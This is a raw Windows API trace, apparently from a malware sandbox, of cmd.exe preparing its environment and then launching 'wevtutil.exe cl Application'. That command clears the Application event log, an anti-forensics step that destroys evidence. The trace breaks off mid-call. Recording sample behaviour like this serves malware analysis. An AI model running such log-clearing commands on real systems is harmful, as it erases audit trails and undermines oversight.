lpBuffer=".COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC") returned 0x35 [0089.521] GetEnvironmentVariableW (in: lpName="PROMPT", lpBuffer=0x4a24f360, nSize=0x2000 | out: lpBuffer="") returned 0x0 [0089.521] _wcsicmp (_String1="PROMPT", _String2="CD") returned 13 [0089.521] _wcsicmp (_String1="PROMPT", _String2="ERRORLEVEL") returned 11 [0089.521] _wcsicmp (_String1="PROMPT", _String2="CMDEXTVERSION") returned 13 [0089.521] _wcsicmp (_String1="PROMPT", _String2="CMDCMDLINE") returned 13 [0089.521] _wcsicmp (_String1="PROMPT", _String2="DATE") returned 12 [0089.521] _wcsicmp (_String1="PROMPT", _String2="TIME") returned -4 [0089.521] _wcsicmp (_String1="PROMPT", _String2="RANDOM") returned -2 [0089.521] _wcsicmp (_String1="PROMPT", _String2="HIGHESTNUMANODENUMBER") returned 8 [0089.522] SetEnvironmentVariableW (lpName="PROMPT", lpValue="$P$G") returned 1 [0089.522] GetProcessHeap () returned 0x300000 [0089.522] HeapFree (in: hHeap=0x300000, dwFlags=0x0, lpMem=0x31b490 | out: hHeap=0x300000) returned 1 [0089.522] GetEnvironmentStringsW () returned 0x31aa00* [0089.522] GetProcessHeap () returned 0x300000 [0089.522] RtlAllocateHeap (HeapHandle=0x300000, Flags=0x8, Size=0xa94) returned 0x31d670 [0089.522] FreeEnvironmentStringsW (penv=0x31aa00) returned 1 [0089.522] GetEnvironmentVariableW (in: lpName="COMSPEC", lpBuffer=0x4a24f360, nSize=0x2000 | out: lpBuffer="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0089.522] GetEnvironmentVariableW (in: lpName="KEYS", lpBuffer=0x4a24f360, nSize=0x2000 | out: lpBuffer="") returned 0x0 [0089.522] _wcsicmp (_String1="KEYS", _String2="CD") returned 8 [0089.522] _wcsicmp (_String1="KEYS", _String2="ERRORLEVEL") returned 6 [0089.522] _wcsicmp (_String1="KEYS", _String2="CMDEXTVERSION") returned 8 [0089.522] _wcsicmp (_String1="KEYS", _String2="CMDCMDLINE") returned 8 [0089.522] _wcsicmp (_String1="KEYS", _String2="DATE") returned 7 [0089.522] _wcsicmp (_String1="KEYS", _String2="TIME") returned -9 [0089.522] _wcsicmp (_String1="KEYS", _String2="RANDOM") returned -7 [0089.522] _wcsicmp (_String1="KEYS", _String2="HIGHESTNUMANODENUMBER") returned 3 [0089.522] GetProcessHeap () returned 0x300000 [0089.522] RtlAllocateHeap (HeapHandle=0x300000, Flags=0x8, Size=0x5c) returned 0x301320 [0089.522] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x14f960 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop") returned 0x25 [0089.522] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop", nBufferLength=0x104, lpBuffer=0x14f960, lpFilePart=0x14f940 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop", lpFilePart=0x14f940*="Desktop") returned 0x25 [0089.522] GetFileAttributesW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop")) returned 0x11 [0089.522] FindFirstFileW (in: lpFileName="C:\\Users", lpFindFileData=0x14f670 | out: lpFindFileData=0x14f670*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0xfda01e06, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0x409658c0, ftLastAccessTime.dwHighDateTime=0x18d1aee, ftLastWriteTime.dwLowDateTime=0x409658c0, ftLastWriteTime.dwHighDateTime=0x18d1aee, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0xec0000ec, cFileName="Users", cAlternateFileName="")) returned 0x319950 [0089.523] FindClose (in: hFindFile=0x319950 | out: hFindFile=0x319950) returned 1 [0089.523] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz", lpFindFileData=0x14f670 | out: lpFindFileData=0x14f670*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x28c670c0, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x409658c0, ftLastAccessTime.dwHighDateTime=0x18d1aee, ftLastWriteTime.dwLowDateTime=0x409658c0, ftLastWriteTime.dwHighDateTime=0x18d1aee, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0xec0000ec, cFileName="5p5NrGJn0jS HALPmcxz", cAlternateFileName="5P5NRG~1")) returned 0x319950 [0089.523] FindClose (in: hFindFile=0x319950 | out: hFindFile=0x319950) returned 1 [0089.523] _wcsnicmp (_String1="5P5NRG~1", _String2="5p5NrGJn0jS HALPmcxz", _MaxCount=0x14) returned 20 [0089.523] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop", lpFindFileData=0x14f670 | out: lpFindFileData=0x14f670*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0x28cff640, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x3d5798e0, ftLastAccessTime.dwHighDateTime=0x18d1aee, ftLastWriteTime.dwLowDateTime=0x3d5798e0, ftLastWriteTime.dwHighDateTime=0x18d1aee, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0xec0000ec, cFileName="Desktop", cAlternateFileName="")) returned 0x319950 [0089.523] FindClose (in: hFindFile=0x319950 | out: hFindFile=0x319950) returned 1 [0089.523] GetFileAttributesW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop")) returned 0x11 [0089.523] SetCurrentDirectoryW (lpPathName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop")) returned 1 [0089.523] SetEnvironmentVariableW (lpName="=C:", lpValue="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop") returned 1 [0089.523] GetProcessHeap () returned 0x300000 [0089.523] HeapFree (in: hHeap=0x300000, dwFlags=0x0, lpMem=0x31d670 | out: hHeap=0x300000) returned 1 [0089.523] GetEnvironmentStringsW () returned 0x31aa00* [0089.523] GetProcessHeap () returned 0x300000 [0089.523] RtlAllocateHeap (HeapHandle=0x300000, Flags=0x8, Size=0xae8) returned 0x31cbd0 [0089.523] FreeEnvironmentStringsW (penv=0x31aa00) returned 1 [0089.523] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x4a25c0a0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop") returned 0x25 [0089.523] GetProcessHeap () returned 0x300000 [0089.523] HeapFree (in: hHeap=0x300000, dwFlags=0x0, lpMem=0x301320 | out: hHeap=0x300000) returned 1 [0089.523] GetProcessHeap () returned 0x300000 [0089.523] RtlAllocateHeap (HeapHandle=0x300000, Flags=0x8, Size=0x4016) returned 0x31ec00 [0089.524] GetProcessHeap () returned 0x300000 [0089.524] RtlAllocateHeap (HeapHandle=0x300000, Flags=0x8, Size=0x4c) returned 0x319950 [0089.524] GetProcessHeap () returned 0x300000 [0089.524] HeapFree (in: hHeap=0x300000, dwFlags=0x0, lpMem=0x31ec00 | out: hHeap=0x300000) returned 1 [0089.524] GetConsoleOutputCP () returned 0x1b5 [0089.524] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x4a25bfe0 | out: lpCPInfo=0x4a25bfe0) returned 1 [0089.524] GetUserDefaultLCID () returned 0x409 [0089.524] GetLocaleInfoW (in: Locale=0x409, LCType=0x1e, lpLCData=0x4a257b50, cchData=8 | out: lpLCData=":") returned 2 [0089.525] GetLocaleInfoW (in: Locale=0x409, LCType=0x23, lpLCData=0x14fa70, cchData=128 | out: lpLCData="0") returned 2 [0089.525] GetLocaleInfoW (in: Locale=0x409, LCType=0x21, lpLCData=0x14fa70, cchData=128 | out: lpLCData="0") returned 2 [0089.525] GetLocaleInfoW (in: Locale=0x409, LCType=0x24, lpLCData=0x14fa70, cchData=128 | out: lpLCData="1") returned 2 [0089.525] GetLocaleInfoW (in: Locale=0x409, LCType=0x1d, lpLCData=0x4a26a740, cchData=8 | out: lpLCData="/") returned 2 [0089.525] GetLocaleInfoW (in: Locale=0x409, LCType=0x31, lpLCData=0x4a26a4a0, cchData=32 | out: lpLCData="Mon") returned 4 [0089.525] GetLocaleInfoW (in: Locale=0x409, LCType=0x32, lpLCData=0x4a26a460, cchData=32 | out: lpLCData="Tue") returned 4 [0089.525] GetLocaleInfoW (in: Locale=0x409, LCType=0x33, lpLCData=0x4a26a420, cchData=32 | out: lpLCData="Wed") returned 4 [0089.525] GetLocaleInfoW (in: Locale=0x409, LCType=0x34, lpLCData=0x4a26a3e0, cchData=32 | out: lpLCData="Thu") returned 4 [0089.525] GetLocaleInfoW (in: Locale=0x409, LCType=0x35, lpLCData=0x4a26a3a0, cchData=32 | out: lpLCData="Fri") returned 4 [0089.525] GetLocaleInfoW (in: Locale=0x409, LCType=0x36, lpLCData=0x4a26a360, cchData=32 | out: lpLCData="Sat") returned 4 [0089.525] GetLocaleInfoW (in: Locale=0x409, LCType=0x37, lpLCData=0x4a26a700, cchData=32 | out: lpLCData="Sun") returned 4 [0089.525] GetLocaleInfoW (in: Locale=0x409, LCType=0xe, lpLCData=0x4a257b40, cchData=8 | out: lpLCData=".") returned 2 [0089.525] GetLocaleInfoW (in: Locale=0x409, LCType=0xf, lpLCData=0x4a26a4e0, cchData=8 | out: lpLCData=",") returned 2 [0089.525] setlocale (category=0, locale=".OCP") returned="English_United States.437" [0089.526] GetProcessHeap () returned 0x300000 [0089.526] RtlAllocateHeap (HeapHandle=0x300000, Flags=0x0, Size=0x20c) returned 0x31d730 [0089.526] GetConsoleTitleW (in: lpConsoleTitle=0x31d730, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\System32\\cmd.exe") returned 0x1b [0089.526] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x76e30000 [0089.526] GetProcAddress (hModule=0x76e30000, lpProcName="CopyFileExW") returned 0x76e423d0 [0089.526] GetProcAddress (hModule=0x76e30000, lpProcName="IsDebuggerPresent") returned 0x76e38290 [0089.526] GetProcAddress (hModule=0x76e30000, lpProcName="SetConsoleInputExeNameW") returned 0x76e417e0 [0089.526] GetProcessHeap () returned 0x300000 [0089.526] RtlAllocateHeap (HeapHandle=0x300000, Flags=0x8, Size=0x4012) returned 0x31ec00 [0089.526] GetProcessHeap () returned 0x300000 [0089.526] HeapFree (in: hHeap=0x300000, dwFlags=0x0, lpMem=0x31ec00 | out: hHeap=0x300000) returned 1 [0089.527] _wcsicmp (_String1="wevtutil.exe", _String2=")") returned 78 [0089.527] _wcsicmp (_String1="FOR", _String2="wevtutil.exe") returned -17 [0089.527] _wcsicmp (_String1="FOR/?", _String2="wevtutil.exe") returned -17 [0089.527] _wcsicmp (_String1="IF", _String2="wevtutil.exe") returned -14 [0089.527] _wcsicmp (_String1="IF/?", _String2="wevtutil.exe") returned -14 [0089.527] _wcsicmp (_String1="REM", _String2="wevtutil.exe") returned -5 [0089.527] _wcsicmp (_String1="REM/?", _String2="wevtutil.exe") returned -5 [0089.527] GetProcessHeap () returned 0x300000 [0089.527] RtlAllocateHeap (HeapHandle=0x300000, Flags=0x8, Size=0xb0) returned 0x31d950 [0089.527] GetProcessHeap () returned 0x300000 [0089.527] RtlAllocateHeap (HeapHandle=0x300000, Flags=0x8, Size=0x2a) returned 0x316530 [0089.528] GetProcessHeap () returned 0x300000 [0089.528] RtlAllocateHeap (HeapHandle=0x300000, Flags=0x8, Size=0x30) returned 0x316570 [0089.528] GetConsoleTitleW (in: lpConsoleTitle=0x14f980, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\System32\\cmd.exe") returned 0x1b [0089.538] GetFileAttributesW (lpFileName="wevtutil.exe" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\wevtutil.exe")) returned 0xffffffff [0089.538] _wcsicmp (_String1="wevtutil", _String2="DIR") returned 19 [0089.538] _wcsicmp (_String1="wevtutil", _String2="ERASE") returned 18 [0089.538] _wcsicmp (_String1="wevtutil", _String2="DEL") returned 19 [0089.538] _wcsicmp (_String1="wevtutil", _String2="TYPE") returned 3 [0089.538] _wcsicmp (_String1="wevtutil", _String2="COPY") returned 20 [0089.538] _wcsicmp (_String1="wevtutil", _String2="CD") returned 20 [0089.538] _wcsicmp (_String1="wevtutil", _String2="CHDIR") returned 20 [0089.538] _wcsicmp (_String1="wevtutil", _String2="RENAME") returned 5 [0089.538] _wcsicmp (_String1="wevtutil", _String2="REN") returned 5 [0089.538] _wcsicmp (_String1="wevtutil", _String2="ECHO") returned 18 [0089.538] _wcsicmp (_String1="wevtutil", _String2="SET") returned 4 [0089.538] _wcsicmp (_String1="wevtutil", _String2="PAUSE") returned 7 [0089.538] _wcsicmp (_String1="wevtutil", _String2="DATE") returned 19 [0089.538] _wcsicmp (_String1="wevtutil", _String2="TIME") returned 3 [0089.538] _wcsicmp (_String1="wevtutil", _String2="PROMPT") returned 7 [0089.538] _wcsicmp (_String1="wevtutil", _String2="MD") returned 10 [0089.538] _wcsicmp (_String1="wevtutil", _String2="MKDIR") returned 10 [0089.538] _wcsicmp (_String1="wevtutil", _String2="RD") returned 5 [0089.538] _wcsicmp (_String1="wevtutil", _String2="RMDIR") returned 5 [0089.538] _wcsicmp (_String1="wevtutil", _String2="PATH") returned 7 [0089.538] _wcsicmp (_String1="wevtutil", _String2="GOTO") returned 16 [0089.538] _wcsicmp (_String1="wevtutil", _String2="SHIFT") returned 4 [0089.538] _wcsicmp (_String1="wevtutil", _String2="CLS") returned 20 [0089.538] _wcsicmp (_String1="wevtutil", _String2="CALL") returned 20 [0089.538] _wcsicmp (_String1="wevtutil", _String2="VERIFY") returned 1 [0089.538] _wcsicmp (_String1="wevtutil", _String2="VER") returned 1 [0089.538] _wcsicmp (_String1="wevtutil", _String2="VOL") returned 1 [0089.538] _wcsicmp (_String1="wevtutil", _String2="EXIT") returned 18 [0089.538] _wcsicmp (_String1="wevtutil", _String2="SETLOCAL") returned 4 [0089.538] _wcsicmp (_String1="wevtutil", _String2="ENDLOCAL") returned 18 [0089.538] _wcsicmp (_String1="wevtutil", _String2="TITLE") returned 3 [0089.538] _wcsicmp (_String1="wevtutil", _String2="START") returned 4 [0089.538] _wcsicmp (_String1="wevtutil", _String2="DPATH") returned 19 [0089.538] _wcsicmp (_String1="wevtutil", _String2="KEYS") returned 12 [0089.538] _wcsicmp (_String1="wevtutil", _String2="MOVE") returned 10 [0089.538] _wcsicmp (_String1="wevtutil", _String2="PUSHD") returned 7 [0089.539] _wcsicmp (_String1="wevtutil", _String2="POPD") returned 7 [0089.539] _wcsicmp (_String1="wevtutil", _String2="ASSOC") returned 22 [0089.539] _wcsicmp (_String1="wevtutil", _String2="FTYPE") returned 17 [0089.539] _wcsicmp (_String1="wevtutil", _String2="BREAK") returned 21 [0089.539] _wcsicmp (_String1="wevtutil", _String2="COLOR") returned 20 [0089.539] _wcsicmp (_String1="wevtutil", _String2="MKLINK") returned 10 [0089.539] _wcsicmp (_String1="wevtutil", _String2="DIR") returned 19 [0089.539] _wcsicmp (_String1="wevtutil", _String2="ERASE") returned 18 [0089.539] _wcsicmp (_String1="wevtutil", _String2="DEL") returned 19 [0089.539] _wcsicmp (_String1="wevtutil", _String2="TYPE") returned 3 [0089.539] _wcsicmp (_String1="wevtutil", _String2="COPY") returned 20 [0089.539] _wcsicmp (_String1="wevtutil", _String2="CD") returned 20 [0089.539] _wcsicmp (_String1="wevtutil", _String2="CHDIR") returned 20 [0089.539] _wcsicmp (_String1="wevtutil", _String2="RENAME") returned 5 [0089.539] _wcsicmp (_String1="wevtutil", _String2="REN") returned 5 [0089.539] _wcsicmp (_String1="wevtutil", _String2="ECHO") returned 18 [0089.539] _wcsicmp (_String1="wevtutil", _String2="SET") returned 4 [0089.539] _wcsicmp (_String1="wevtutil", _String2="PAUSE") returned 7 [0089.539] _wcsicmp (_String1="wevtutil", _String2="DATE") returned 19 [0089.539] _wcsicmp (_String1="wevtutil", _String2="TIME") returned 3 [0089.539] _wcsicmp (_String1="wevtutil", _String2="PROMPT") returned 7 [0089.539] _wcsicmp (_String1="wevtutil", _String2="MD") returned 10 [0089.539] _wcsicmp (_String1="wevtutil", _String2="MKDIR") returned 10 [0089.539] _wcsicmp (_String1="wevtutil", _String2="RD") returned 5 [0089.539] _wcsicmp (_String1="wevtutil", _String2="RMDIR") returned 5 [0089.539] _wcsicmp (_String1="wevtutil", _String2="PATH") returned 7 [0089.539] _wcsicmp (_String1="wevtutil", _String2="GOTO") returned 16 [0089.539] _wcsicmp (_String1="wevtutil", _String2="SHIFT") returned 4 [0089.539] _wcsicmp (_String1="wevtutil", _String2="CLS") returned 20 [0089.539] _wcsicmp (_String1="wevtutil", _String2="CALL") returned 20 [0089.539] _wcsicmp (_String1="wevtutil", _String2="VERIFY") returned 1 [0089.539] _wcsicmp (_String1="wevtutil", _String2="VER") returned 1 [0089.539] _wcsicmp (_String1="wevtutil", _String2="VOL") returned 1 [0089.539] _wcsicmp (_String1="wevtutil", _String2="EXIT") returned 18 [0089.539] _wcsicmp (_String1="wevtutil", _String2="SETLOCAL") returned 4 [0089.539] _wcsicmp (_String1="wevtutil", _String2="ENDLOCAL") returned 18 [0089.539] _wcsicmp (_String1="wevtutil", _String2="TITLE") returned 3 [0089.539] _wcsicmp (_String1="wevtutil", _String2="START") returned 4 [0089.539] _wcsicmp (_String1="wevtutil", _String2="DPATH") returned 19 [0089.539] _wcsicmp (_String1="wevtutil", _String2="KEYS") returned 12 [0089.539] _wcsicmp (_String1="wevtutil", _String2="MOVE") returned 10 [0089.540] _wcsicmp (_String1="wevtutil", _String2="PUSHD") returned 7 [0089.540] _wcsicmp (_String1="wevtutil", _String2="POPD") returned 7 [0089.540] _wcsicmp (_String1="wevtutil", _String2="ASSOC") returned 22 [0089.540] _wcsicmp (_String1="wevtutil", _String2="FTYPE") returned 17 [0089.540] _wcsicmp (_String1="wevtutil", _String2="BREAK") returned 21 [0089.540] _wcsicmp (_String1="wevtutil", _String2="COLOR") returned 20 [0089.540] _wcsicmp (_String1="wevtutil", _String2="MKLINK") returned 10 [0089.540] _wcsicmp (_String1="wevtutil", _String2="FOR") returned 17 [0089.540] _wcsicmp (_String1="wevtutil", _String2="IF") returned 14 [0089.540] _wcsicmp (_String1="wevtutil", _String2="REM") returned 5 [0089.540] GetProcessHeap () returned 0x300000 [0089.540] RtlAllocateHeap (HeapHandle=0x300000, Flags=0x8, Size=0x218) returned 0x31da10 [0089.540] GetProcessHeap () returned 0x300000 [0089.540] RtlAllocateHeap (HeapHandle=0x300000, Flags=0x8, Size=0x4a) returned 0x319a10 [0089.540] _wcsnicmp (_String1="wevt", _String2="cmd ", _MaxCount=0x4) returned 20 [0089.541] GetProcessHeap () returned 0x300000 [0089.541] RtlAllocateHeap (HeapHandle=0x300000, Flags=0x8, Size=0x420) returned 0x31dc30 [0089.541] SetErrorMode (uMode=0x0) returned 0x0 [0089.541] SetErrorMode (uMode=0x1) returned 0x0 [0089.541] GetFullPathNameW (in: lpFileName=".", nBufferLength=0x208, lpBuffer=0x31dc40, lpFilePart=0x14f210 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop", lpFilePart=0x14f210*="Desktop") returned 0x25 [0089.541] SetErrorMode (uMode=0x0) returned 0x1 [0089.541] GetProcessHeap () returned 0x300000 [0089.541] RtlReAllocateHeap (Heap=0x300000, Flags=0x0, Ptr=0x31dc30, Size=0x76) returned 0x31dc30 [0089.541] GetProcessHeap () returned 0x300000 [0089.541] RtlSizeHeap (HeapHandle=0x300000, Flags=0x0, MemoryPointer=0x31dc30) returned 0x76 [0089.541] GetEnvironmentVariableW (in: lpName="PATH", lpBuffer=0x4a24f360, nSize=0x2000 | out: lpBuffer="C:\\Windows\\system32;C:\\Windows;C:\\Windows\\System32\\Wbem;C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\") returned 0x63 [0089.541] NeedCurrentDirectoryForExePathW (ExeName=".") returned 1 [0089.541] GetProcessHeap () returned 0x300000 [0089.541] RtlAllocateHeap (HeapHandle=0x300000, Flags=0x8, Size=0x128) returned 0x31dcc0 [0089.541] GetProcessHeap () returned 0x300000 [0089.541] RtlAllocateHeap (HeapHandle=0x300000, Flags=0x8, Size=0x240) returned 0x31ddf0 [0089.546] GetProcessHeap () returned 0x300000 [0089.546] RtlReAllocateHeap (Heap=0x300000, Flags=0x0, Ptr=0x31ddf0, Size=0x12a) returned 0x31ddf0 [0089.546] GetProcessHeap () returned 0x300000 [0089.546] RtlSizeHeap (HeapHandle=0x300000, Flags=0x0, MemoryPointer=0x31ddf0) returned 0x12a [0089.546] GetEnvironmentVariableW (in: lpName="PATHEXT", lpBuffer=0x4a24f360, nSize=0x2000 | out: lpBuffer=".COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC") returned 0x35 [0089.546] GetProcessHeap () returned 0x300000 [0089.546] RtlAllocateHeap (HeapHandle=0x300000, Flags=0x8, Size=0xe8) returned 0x31df30 [0089.546] GetProcessHeap () returned 0x300000 [0089.546] RtlReAllocateHeap (Heap=0x300000, Flags=0x0, Ptr=0x31df30, Size=0x7e) returned 0x31df30 [0089.546] GetProcessHeap () returned 0x300000 [0089.547] RtlSizeHeap (HeapHandle=0x300000, Flags=0x0, MemoryPointer=0x31df30) returned 0x7e [0089.547] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3 [0089.547] FindFirstFileExW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\wevtutil.exe", fInfoLevelId=0x1, lpFindFileData=0x14ef80, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x14ef80) returned 0xffffffffffffffff [0089.548] GetLastError () returned 0x2 [0089.548] FindFirstFileExW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\wevtutil.exe.*", fInfoLevelId=0x1, lpFindFileData=0x14ef80, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x14ef80) returned 0xffffffffffffffff [0089.548] GetLastError () returned 0x2 [0089.548] FindFirstFileExW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\wevtutil.exe", fInfoLevelId=0x1, lpFindFileData=0x14ef80, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x14ef80) returned 0xffffffffffffffff [0089.548] GetLastError () returned 0x2 [0089.548] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3 [0089.548] FindFirstFileExW (in: lpFileName="C:\\Windows\\system32\\wevtutil.exe", fInfoLevelId=0x1, lpFindFileData=0x14ef80, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x14ef80) returned 0x319a70 [0089.548] GetProcessHeap () returned 0x300000 [0089.548] RtlAllocateHeap (HeapHandle=0x300000, Flags=0x0, Size=0x28) returned 0x3145f0 [0089.548] FindClose (in: hFindFile=0x319a70 | out: hFindFile=0x319a70) returned 1 [0089.548] _wcsicmp (_String1=".exe", _String2=".CMD") returned 2 [0089.548] _wcsicmp (_String1=".exe", _String2=".BAT") returned 3 [0089.548] GetConsoleTitleW (in: lpConsoleTitle=0x14f4d0, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\System32\\cmd.exe") returned 0x1b [0089.548] InitializeProcThreadAttributeList (in: lpAttributeList=0x14f288, dwAttributeCount=0x1, dwFlags=0x0, lpSize=0x14f248 | out: lpAttributeList=0x14f288, lpSize=0x14f248) returned 1 [0089.548] UpdateProcThreadAttribute (in: lpAttributeList=0x14f288, dwFlags=0x0, Attribute=0x60001, lpValue=0x14f238, cbSize=0x4, lpPreviousValue=0x0, lpReturnSize=0x0 | out: lpAttributeList=0x14f288, lpPreviousValue=0x0) returned 1 [0089.548] GetStartupInfoW (in: lpStartupInfo=0x14f3a0 | out: lpStartupInfo=0x14f3a0*(cb=0x68, lpReserved="", lpDesktop="WinSta0\\Default", lpTitle="C:\\Windows\\System32\\cmd.exe", dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x1, wShowWindow=0x0, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x1, hStdOutput=0x0, hStdError=0x0)) [0089.548] GetProcessHeap () returned 0x300000 [0089.549] RtlAllocateHeap (HeapHandle=0x300000, Flags=0x8, Size=0x20) returned 0x314620 [0089.549] _wcsnicmp (_String1="COPYCMD", _String2="=C:=C:\\", _MaxCount=0x7) returned 38 [0089.549] _wcsnicmp (_String1="COPYCMD", _String2="ALLUSER", _MaxCount=0x7) returned 2 [0089.549] _wcsnicmp (_String1="COPYCMD", _String2="APPDATA", _MaxCount=0x7) returned 2 [0089.549] _wcsnicmp (_String1="COPYCMD", _String2="CommonP", _MaxCount=0x7) returned 3 [0089.549] _wcsnicmp (_String1="COPYCMD", _String2="CommonP", _MaxCount=0x7) returned 3 [0089.549] _wcsnicmp (_String1="COPYCMD", _String2="CommonP", _MaxCount=0x7) returned 3 [0089.549] _wcsnicmp (_String1="COPYCMD", _String2="COMPUTE", _MaxCount=0x7) returned 3 [0089.549] _wcsnicmp (_String1="COPYCMD", _String2="ComSpec", _MaxCount=0x7) returned 3 [0089.549] _wcsnicmp (_String1="COPYCMD", _String2="FP_NO_H", _MaxCount=0x7) returned -3 [0089.549] _wcsnicmp (_String1="COPYCMD", _String2="HOMEDRI", _MaxCount=0x7) returned -5 [0089.549] _wcsnicmp (_String1="COPYCMD", _String2="HOMEPAT", _MaxCount=0x7) returned -5 [0089.549] _wcsnicmp (_String1="COPYCMD", _String2="LOCALAP", _MaxCount=0x7) returned -9 [0089.549] _wcsnicmp (_String1="COPYCMD", _String2="LOGONSE", _MaxCount=0x7) returned -9 [0089.549] _wcsnicmp (_String1="COPYCMD", _String2="NUMBER_", _MaxCount=0x7) returned -11 [0089.549] _wcsnicmp (_String1="COPYCMD", _String2="OS=Wind", _MaxCount=0x7) returned -12 [0089.549] _wcsnicmp (_String1="COPYCMD", _String2="Path=C:", _MaxCount=0x7) returned -13 [0089.549] _wcsnicmp (_String1="COPYCMD", _String2="PATHEXT", _MaxCount=0x7) returned -13 [0089.549] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0089.549] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0089.549] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0089.549] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0089.549] _wcsnicmp (_String1="COPYCMD", _String2="Program", _MaxCount=0x7) returned -13 [0089.549] _wcsnicmp (_String1="COPYCMD", _String2="Program", _MaxCount=0x7) returned -13 [0089.549] _wcsnicmp (_String1="COPYCMD", _String2="Program", _MaxCount=0x7) returned -13 [0089.549] _wcsnicmp (_String1="COPYCMD", _String2="Program", _MaxCount=0x7) returned -13 [0089.549] _wcsnicmp (_String1="COPYCMD", _String2="PROMPT=", _MaxCount=0x7) returned -13 [0089.549] _wcsnicmp (_String1="COPYCMD", _String2="PSModul", _MaxCount=0x7) returned -13 [0089.549] _wcsnicmp (_String1="COPYCMD", _String2="PUBLIC=", _MaxCount=0x7) returned -13 [0089.549] _wcsnicmp (_String1="COPYCMD", _String2="SystemD", _MaxCount=0x7) returned -16 [0089.549] _wcsnicmp (_String1="COPYCMD", _String2="SystemR", _MaxCount=0x7) returned -16 [0089.549] _wcsnicmp (_String1="COPYCMD", _String2="TEMP=C:", _MaxCount=0x7) returned -17 [0089.549] _wcsnicmp (_String1="COPYCMD", _String2="TMP=C:\\", _MaxCount=0x7) returned -17 [0089.549] _wcsnicmp (_String1="COPYCMD", _String2="USERDOM", _MaxCount=0x7) returned -18 [0089.550] _wcsnicmp (_String1="COPYCMD", _String2="USERNAM", _MaxCount=0x7) returned -18 [0089.550] _wcsnicmp (_String1="COPYCMD", _String2="USERPRO", _MaxCount=0x7) returned -18 [0089.550] _wcsnicmp (_String1="COPYCMD", _String2="windir=", _MaxCount=0x7) returned -20 [0089.550] _wcsnicmp (_String1="COPYCMD", _String2="windows", _MaxCount=0x7) returned -20 [0089.550] _wcsnicmp (_String1="COPYCMD", _String2="windows", _MaxCount=0x7) returned -20 [0089.550] GetProcessHeap () returned 0x300000 [0089.550] HeapFree (in: hHeap=0x300000, dwFlags=0x0, lpMem=0x314620 | out: hHeap=0x300000) returned 1 [0089.550] GetProcessHeap () returned 0x300000 [0089.550] RtlAllocateHeap (HeapHandle=0x300000, Flags=0x8, Size=0x12) returned 0x318360 [0089.550] lstrcmpW (lpString1="\\wevtutil.exe", lpString2="\\XCOPY.EXE") returned -1 [0089.551] CreateProcessW (in: lpApplicationName="C:\\Windows\\system32\\wevtutil.exe", lpCommandLine="wevtutil.exe cl Application", lpProcessAttributes=0x0, lpThreadAttributes=0x0, bInheritHandles=1, dwCreationFlags=0x80000, lpEnvironment=0x0, lpCurrentDirectory="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop", lpStartupInfo=0x14f2c0*(cb=0x70, 